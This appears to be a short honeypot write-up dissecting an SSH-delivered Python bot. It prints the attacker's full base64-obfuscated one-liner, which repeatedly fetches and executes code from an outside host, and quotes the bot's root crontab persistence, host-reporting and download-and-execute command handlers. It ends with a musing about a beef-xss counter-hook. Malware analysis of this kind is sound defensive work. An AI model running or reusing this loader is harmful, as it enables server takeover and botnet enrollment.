another nice ssh honeypot-catch:
uname nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgIC
AgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNjL0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYW
dlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='))" > /dev/null 2 >& 1 &
That downloads a base64-encoded complete python-program fromĀ http://k.zsw8.cc/Api/
In that program a crontab-entry is made
if runCodePath not in crontabData:
f = open("/etc/crontab", "a+")
f.write("\n0 */6 * * * root %s\n" % runCodePath)
then it loads data about the hacked server to the herder:
my_data = {"key":d.get_key, "name":d.get_name, "os":d.get_platform, "core":d.get_core, "cpu":d.get_cpucount, "cpuuse":d.get_cpuuse, "status":d.get_status}
f = urllib.urlopen(apiURL, urllib.urlencode(my_data))
and waits for commands:
if data.has_key("download") and data["download"]:
DownExec(data["download"], task_id)
if data.has_key("cmd") and data["cmd"]:
CmdExec(data["cmd"], task_id)
Wonder what would happen if the computer name would be a beef-xss hook or something..?